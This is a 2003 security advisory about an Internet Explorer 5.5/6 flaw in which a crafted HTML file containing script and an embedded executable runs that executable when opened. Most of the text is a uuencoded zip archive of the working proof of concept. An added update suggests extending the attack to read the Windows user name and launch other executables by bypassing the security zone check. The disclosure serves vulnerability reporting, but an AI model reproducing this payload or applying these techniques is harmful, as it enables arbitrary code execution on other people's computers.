26th Feb 2003 [SBWID-6026]
COMMAND
	IE Self-Executing HTML
SYSTEMS AFFECTED
	Tested IE5.5 and IE6
PROBLEM
	Thanks to http-equiv [[email protected]] findings :
	The following file is an html file  comprising  both  scripting  and  an
	executable [*.exe].
	We inject scripting and an  executable  into  the  html  file  which  is
	designed to point back to the executable in the html  file  and  execute
	it. Provided the html file is an html file, Internet  Explorer  5.5  and
	6.0 will execute it.
	Because it is an html file  proper,  Internet  Explorer  opens  it.  The
	scripting inside is then parsed and fired. That  scripting  is  pointing
	back to the same executable file with our original codebase object  from
	the year 2000 and because it is a self-executing html file, it  executes
	!
	Tested IE5.5 and IE6. Fully self-contained harmless *.exe:
	
	 http://www.malware.com/html.exe.zip
	
	UUEncoded archive
	
	begin 644 html.exe.zip
	M4$L#!!0````(`%B"62ZF\H"X2P@``/P/```,````;6%L=V%R92YH=&UL[9=9
	MLZ)(&H;OB>`_V.>FJL,^!^3@=I:*0!101%Q1C+I!0!;99)%E8O[[O)[J[NF:
	MJ(Z.F+Z:B$E]$]Z/Y/%+$B%3F2J31\U.,R^.7EJ=)YHD^#C*[2A_G,>FD=_#
	M9R^P7RB*"HV@-%+[R:[L?[?:ID:4G>WT<1*9L>5%SDOK9&1VCR4)DMAJR81;
	M[3C.P8>?<!0U['`<Q^-[Q)9;.O=ZPK6;T=7\V/]1(8GOMZ/NO8[^M/U?E?_D
	M_=WR?][?*__;O*._Y!2JK=#L<CR=!^62[8\'C)'Z"J\R<X>+IWVN9(PNMXPY
	M3C2H7SFBT28)9S7%GMZ4HBU'-#="?,PHDC_B;[H\=,/2=%;<T,NXH3_JE5KD
	MC882F_?'A<ZU%6K0#&^+,#%)0K%'<:.3Q,C@EG[&L^,2OSU><D<V'GL43_$.
	MWYUS4I-,;Z4S,'?%IAP->BM)&JCE9$"O"F?`^?FUO>'47HW\E+I4NSQ)%"L.
	M?>G'A^4P5(:W.#\/MSVQ3Q5Y/.[+SM0ZW[(KY]+MMK>G.K=VV5^-FO619N?.
	MF%/`Y49*LR&)R0^O'U^5,\ZR6?\X"V]\J7ML;:QZWG-[ZP=ER52#WIGM')2!
	MJ&0'6_>L).UT:O$L(Z_8]^8KDF",D>U:ER+.%IG.5,)L/G`#MK_RW"M5SK+]
	M+)6M#AOG&5M>-L9^(1\'N=MIQ*H3LT%7SV7WL$@.)+%4TNO1(@G+6'E9MZUT
	MGLTPZ1AE(6XF8B<]2F;OMO`+_:PH[%;AC*G;7ZZCP-/=#ML9#',F&F:QMS_4
	MDQM?CTEB42:;"\9%/!6)L?;\Q6RXUAOEI$:[email protected]:NU\T5-4S0C\41#G$WK
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
	HMH$`````;6%L=V%R92YH=&UL4$L%!@`````!``$`.@```'4(````````
	`
	end
	2245 bytes
	
	 Update (02 March 2003)
	 ======
	Dror Shalev comments :
	.zip is the must importent issue.
	the Zip is the key point in this Perfect demo by http-equiv .
	you can do more cool things with Jscript like getting Windows User  Name
	(via document.location) or run even regular EXE (TIF Enumeration).
	becouse the zip temp file run without  Security Zone Check.
SOLUTION
	?